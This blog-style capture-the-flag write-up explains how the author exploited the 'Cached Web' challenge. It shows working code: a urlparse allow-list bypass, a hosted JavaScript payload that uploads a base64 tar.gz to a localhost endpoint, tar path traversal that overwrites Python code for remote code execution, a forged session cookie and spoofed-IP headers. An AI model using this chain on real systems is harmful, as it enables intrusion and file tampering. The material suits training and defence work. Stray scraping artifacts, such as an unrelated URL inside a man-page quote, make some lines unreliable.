Author: SRT, Dylan (bamhm182/BytePen online)
Synack held a miniature Capture the Flag event from [email protected] until [email protected] This event consisted of only one challenge and promised a percentage of time off of the total time of their full #TeamAmerica Defenders CTF that took place from [email protected] until [email protected] You can find out more information here.
I have only had the chance to participate in a couple Synack CTFs, and the prizes are great but pale in comparison compared to a chance to join the Synack Red Team (SRT).
About the Author
My name is Dylan (bamhm182/BytePen online) and out of 150 participants, I was one of only two who managed to solve this challenge while the CTF was active. The complexities of this challenge caused quite a bit of strife for those who aimed to complete it, and as such, I’ve had many people reach out asking how it worked. I enjoy writing CTF write-ups (which I normally post to one of my GitLab groups) when I’m able to, and was incredibly excited when I reached out to Synack and they offered me the chance to write this blog post.
I have traditionally served more of a “Help Desk IT” role through my working life, with a transition into Software Development a few years back, and another into Penetration Testing type work in 2019. I joined the Synack Red Team (SRT) in February of 2020 and have had the exciting opportunity to complete over 600 Missions and a small collection of vulnerabilities since I was onboarded. I would still consider myself very new to this career field and find it mind blowing the amount of work I’ve been able to complete and the amount of practical knowledge I’ve been able to obtain through being a member of the SRT.
Anyway, enough about me, let’s get to what you all came here for; the write-up for the Cached Web challenge of the Synack TeamAmerica Defenders CTF!!!
Cached Web
When visiting the HackTheBox CTF page for this challenge, we are given the description “I made a service for people to cache their favorite websites, come and check it out!” and the zip file containing the challenge here.
If you’re at all interested, I highly recommend that you download the zip for this challenge and give it a go before continuing to read this page. It utilizes Docker, so you will need to have that installed, but other than that, you should simply be able to run the shell script that is included (or run the commands within the shell script if you’re using Windows. They’re the same commands). When you run it, it will be available on http://localhost:1337 and you should be presented with the web application seen below:
One note I would like to make that may not be immediately obvious to those not familiar with Docker is that at any time, you can use the command docker exec -it web_cached_web /bin/ash to “drop into” the running docker container. This will allow you to modify the code as it runs in real time and will help you explore how exactly things are working behind the scenes. I will use this tactic and reference it in the rest of the write-up.
At first glance, I thought this was going to be cake. Not only were we provided the source code for the application, but the application itself didn’t seem that complicated. Without looking deeply into it, I figured that it would be some sort of Insecure Direct Object Reference (IDOR), Local File Inclusion (LFI) or Server Side Request Forgery (SSRF) attack. None of these were too far off, but I drastically underestimated how easy it would be to pull off.
The first thing that I like to do when presented with a challenge like this is to determine what exactly the program is intended to do and maybe gain some information about how it works. After playing with this, we determine that the application works by reaching out to the website you entered and takes a screenshot of whatever loads, then gives you the screenshot. It does this using an automated browser software named Selenium, which controls a Google Chrome based browser.
As an example, when entering https://google.com/search?q=test, you get the following, which tells us that it does actually reach out to the internet as opposed to providing you with pre-created screenshots.
The problem here is that if you look at the util.py, you will notice that there are only 3 allowed domains; google.com, amazon.com, and twitter.com:
def is_scheme_allowed(scheme):
return scheme in [‘http’, ‘https’]
def is_domain_allowed(domain):
# TODO: Unrestrict when we reach production stage
return domain in [‘google.com’, ‘amazon.com’, ‘twitter.com’]
Additionally, you’ll find out that trying a subdomain, such as sites.google.com will reject the request, so this means that the code must believe that it has no subdomain.
We can examine the following code from util.py to learn how the domain and schema are determined and evaluated:
def cache_web(url):
domain = urlparse(url).hostname
scheme = urlparse(url).scheme
if not domain or not scheme:
return flash(f‘Malformed url {url}’, ‘danger’)
elif not is_scheme_allowed(scheme):
return flash(f‘Scheme {scheme} is not allowed’, ‘danger’)
elif not is_domain_allowed(domain):
return flash(f’Domain {domain} is not allowed’, ‘danger’)
elif cache.exists(domain):
return serve_cached_web(url, domain)
elif is_html(url):
return serve_screenshot_from(url, domain)
This is where I had a really lucky break.
I was throwing random values into the URL field to see if I could make anything abnormal happen and saw the following message when I entered http://google.com[:-10]
I was definitely expecting that my domain would be google.com, not :-10, so that told me there may be something there.
I tried entering a few websites like https://ebay.com[google.com], which never loaded, and https://ebay.com/[google.com], which told me ebay.com is not allowed. I eventually stumbled upon https://ebay.com[google.com], which gave me the following:
You should notice that at the top, it says the domain is google.com, yet the image is very obviously ebay.com. Bingo!
So where do we go from here? If we can make the website visit ebay.com, perhaps we can make it visit any website. I was thinking that perhaps I could try something like https://sites.google.com/d/mywebsite[google.com], but a couple problems arose from this.
Namely, having any sort of / broke the domain name manipulation.
If we visit https://drive.google.com[google.com], we see Bad Request Error 400 instead of an error message stating that we cannot visit drive.google.com.
With that, we can determine that whatever we need to happen must happen at the root of whatever domain we are using and that we are able to use subdomains with this workaround.
The quickest way I could think to make this happen was to add a subdomain to one of my domains and store some code in an Amazon AWS S3 Bucket.
I won’t go into too much detail on this because there are a thousand tutorials on how to host a static website on AWS and point a subdomain at it, but at a real basic level, I created the bucket htb.bpen.io and put in a very basic index.html that would prove it’s working by visiting the S3 url.
I then created a new CNAME record that points htb.bpen.io to s3-website-us-east-1.amazonaws.com.
I made sure that I could see my test by visiting http://htb.bpen.io directly, however, when I visited the website within the challenge via http://htb.bpen.io[google.com], I see the following:
This isn’t a problem, and actually gives us a hint we can use to progress further if we’re paying attention and gives us more information as to what exactly is happening. We can see that the requested key “[google.com]” is not found.
In “AWS Speak”, this means 404: File not found for http://htb.bpen.io/[google.com], so it’s looking for a file named [google.com inside of my bucket. Let’s rename index.html to [google.com] and try again.
Now we get the following:
Perfect! Now we just need to figure out how to leverage this to get it to spit out the flag.
If we dig through the source code some more, we find this code that looks pretty interesting within routes.py:
# TODO: Boot up the selenium grid for the scraper we’re working on
@is_bot
@api.route(‘/upload’, methods=[‘POST’])
@is_from_localhost
def upload():
if ‘file’ not in request.files:
return abort(400)
if extract_from_scraper(request.files[‘file’]):
return ‘ok’, 200
return ”, 204
I’ll explain the decorators (@is_bot and @is_from_localhost) more down in the Rabbit Holes section below, because I definitely spent a long time on them, but for now we’ll just accept that this means “selenium must be the one to use this endpoint” because that’s the security that these decorators provide.
We determine that if a file is provided to this URL, it will pass this information to extract_from_scraper(), which we can see in util.py following:
def extract_from_scraper(file):
tmp = tempfile.gettempdir()
path = os.path.join(tmp, file.filename)
file.save(path)
if tarfile.is_tarfile(path):
tar = tarfile.open(path, ‘r:gz’)
tar.extractall(tmp)
for name in filter(lambda x: x.endswith(‘.png’), tar.getnames()):
filename = f'{generate(14)}.png’
os.rename(os.path.join(tmp, name), ‘{main.app.config[“UPLOAD_FOLDER”]}/{filename}’)
cache.new(name[:-4], filename)
tar.close()
return True
return False
This code will take the file sent to api/upload and save it to /tmp, then it will make sure that it is a tar file and try to open it with r:gz (which will make sure it is a gzip file).
I removed the @is_bot and @is_from_localhost from the upload() route within the local docker container and started throwing stuff at this until I got something to work.
Eventually, I determined that if I upload the following code to my http://htb.bpen.io[google.com] file and then visit this URL within the application and it would create a request on behalf of selenium that uploads a file I have stored in the b64Data variable to api/uploads.
This JavaScript may look a bit complex if you are unfamiliar with it, but it isn’t terrible if broken down. I am storing the base64 of a test .tar.gz file in the variable b64Data, then I am converting this into a “blob”, which can be sent as part of a FormData object using an XMLHttpRequest.
This base64 came from the command echo “hi” > test.txt && tar cvzf – test.txt | base64 | tr -d “n”, which will create a file named test.txt and contains ‘hi’, then create the base64 of a tar file containing test.txt on one line so it can easily be inserted into the file.
<!DOCTYPE html>
<html<
<body<
<script<
const b64Data=”H4sIAAAAAAAAA+3OMQqDQBSE4a09xZ5A9u1bXa9jIKCFjT7B48eAgk0QBAnC/zVTzBRj78lKW8zdKKzqlL4puQrH3KgTzZoka6XrTmKM4ny489RunqwdvXevdugGaeKv3Vn/UF1f/PsCAAAAAAAAAAAAAAAAAOCCDzOulTgAKAAA”
const byteCharacters = atob(b64Data);
const byteArrays = [];
const sliceSize=512;
const contentType=’multipart/form-data’;
for (let offset = 0; offset < byteCharacters.length; offset += sliceSize) {
const slice = byteCharacters.slice(offset, offset + sliceSize);
const byteNumbers = new Array(slice.length);
for (let i = 0; i < slice.length; i++) {
byteNumbers[i] = slice.charCodeAt(i);
}
const byteArray = new Uint8Array(byteNumbers);
byteArrays.push(byteArray);
}
const blob = new Blob(byteArrays, {type: contentType});
var formData = new FormData();
formData.append(‘file’, blob, ‘test.tar.gz’);
var xhr = new XMLHttpRequest();
xhr.open(‘POST’,’http://localhost:1337/api/upload’, true);
xhr.send(formData);
</script<
</body<
</html<
When we run this command, we can go into the docker container and we will see our file at /tmp/test.txt.
You may note that the code in extract_from_scraper() doesn’t actually do anything to make sure that the files are extracted to any specific location. It just extracts to wherever tar wants to extract them.
You’re well prepared if you know about the -P flag for tar, which is described in the man page as http://www.synack.com/product-demo-page-test/Don’t strip leading slashes from file names when creating archives. and will allow us to specify exactly where we want to extract the file based on some file path manipulation.
From here, there are probably a thousand ways to complete this challenge. I decided that I wanted to modify the python to put /app/flag (the location of the flag as determined by inspecting the provided zip and the Docker container) somewhere I knew I could read it, such as /app/application/static/screenshots/flag.txt (the location of screenshots within the application).
On my local box, I created /tmp/app/application and copied the file util.py from the source code to this new folder. After inspecting the code, I learned that flash() is executed every time that the banner at the top of the page appears. Since it’s easy to call, I figured it would be a good candidate for my code to retrieve the flag. I then modified the function flash() as seen below:
Original
def flash(message, level, **kwargs):
return { ‘message’:message, ‘level’:level, **kwargs }
Modified
def flash(message, level, **kwargs):
os.rename(‘/app/flag’, ‘/app/application/static/screenshots/flag.txt’)
return { ‘message’:message, ‘level’:level, **kwargs }
I then cd’d to /tmp/app and ran tar cvzPf – ../app | base64 | tr -d “n” to get the following base64:
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
I updated my JavaScript from before with this new b64Data payload, put it in my S3 bucket with the name [google.com], and visited http://htb.bpen.io[google.com].
I saw the following on the challenge page:
If we visit the page http://localhost:1337/static/screenshots/flag.txt right this second though, it won’t be there.
That’s because the newly added code hasn’t actually run yet.
Now we can enter absolutely anything that would cause the banner to appear and our os.rename() action will take place.
I visited https://google.com and noticed it took a very long time to complete, then I went to the aforementioned flag URL (http://localhost:1337/static/screenshots/flag.txt) and saw the flag HTB{f4k3_fl4g_f0r_t3st1ng}:
Now it’s time for the real deal!
We spin up our docker container from the HTB CTF infrastructure and go to our assigned port (ex: docker.hackthebox.eu:30183).
We enter our payload url of http://htb.bpen.io[google.com] and make sure everything works like we expect.
Then we enter anything to make the flash() banner appear and navigate to our flag URL.
We can then see our flag HTB{sl1p_sl1p_dr1p_dr1p…RCE!}:
Rabbit Holes
I went down a few rabbit holes in this challenge, and figured I’d spend a few seconds talking about the ones I remember here.
I’m sure there are a lot that I can’t remember, but these are the ones that took the most time for me.
api/upload decorators
There are two decorators on the upload() function that is mapped to /api/upload; @is_bot and @is_from_localhost.
If figured out that there is a session cookie like this following:
eyJyb2xlIjoiZ3Vlc3QifQ.X3D8SA.xTyWyIERtL6l8AkK5cb_N7Vn8Tw
You should note that this looks like base64 and is delimited by periods. This is how the application stores session variables.
If you decode the first portion, you’ll see something like {“role”: “guest”}.
I found out that if I base64 encode {“role”: “guest”, “bot”: “yes”}, I can set the token to the following in any requests and then bypass @is_bot:
eyJyb2xlIjogImd1ZXN0IiwgImJvdCI6ICJ5ZXMifQ.X3D8SA.xTyWyIERtL6l8AkK5cb_N7Vn8Tw
The hard part is bypassing @is_from_localhost.
Normally, you MAY be able to set additional request headers like the following and bypass checks like these, however, I couldn’t get it to work in this instance:
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
I eventually figured out that you could add the following code to various points of the python and get it to output the request.remote_addr variable to the logs:
import sys
print(request.remote_addr, file=sys.stderr)
No matter that I did, it always returned that the variable was empty.
I feel like there is a way to bypass this, which would allow you to make a POST request within Burp Suite to upload a file instead of having to do the custom (hosted) JavaScript above, but I couldn’t figure it out.
What do I upload?
I spent a very long time after finally figuring out how to turn the ability to upload a tar into something that I could exploit.
My original thoughts were that because of the png code extract_from_scraper() code above, that I must need to figure out how to get RCE on the target by uploading some sort of malicious image and visiting it or getting selenium to visit it.
At one point, I created a tar.gz file as I did above with a .png inside.
I found out that if I visited my website as done in the walkthrough two times within 10 seconds, I could make whatever image I wanted appear as seen below:
This was cool, but ultimately pointless since the file always ended in .png and to the best of my knowledge, there’s no way to directly execute server-side code by visiting an image. This may be possible since selenium is the one requesting the image, but that’s above my current level of expertise.
Tar Trouble
I spent a very long time trying to figure out how to upload a file to the server.
I had a POST request I was trying for a while with the Content-Type multipart/form-data and the file with either base64 or the bytestring as the body.
I kept getting files on the server that were either tar OR gzip, never both.
I probably spent a good few hours trying to upload something that worked before giving up submitting a POST request and going for the JavaScript above.
For a while, I went down the path of thinking that the tar’s name was the thing I was supposed to be modifying.
I ended up changing my javascript a few times to make it named things like ../app/application/whatever.tar.gz and noticed that I could put the tar file wherever I wanted.
This may be useful in some circumstances, however, it wasn’t useful for me here.
Conclusion
This was a very difficult CTF that took me many hours of pounding my head against my keyboard. If you tried and didn’t get it, you should absolutely not feel ashamed or discouraged. Instead, I encourage you to keep the information here in the back of your mind in case you ever run into this in the future. Unlike many CTF challenges, I found this one to be very “true to life” in that it required me to throw stuff at the wall until something stuck, which ended up being a weird bug within a popular python library that real-world developers may be using and in a way that real-world developers may be using it. While it may be unlikely that something like this would be implemented in this exact manner, I could absolutely see a circumstance in which you are assessing a website with a python backend and that website contains the same sort of validation check to ensure that whatever file is being requested is within one of their approved domains. If you happened to be the SRT member who stumbled across that bug, that’d net you quite a bit more than the first place prize of 25% off your time in the next CTF.
I hope that this write-up has taught you something or at the very least, you enjoyed reading it. If so, please reach out to me in the Synack Red Team Slack!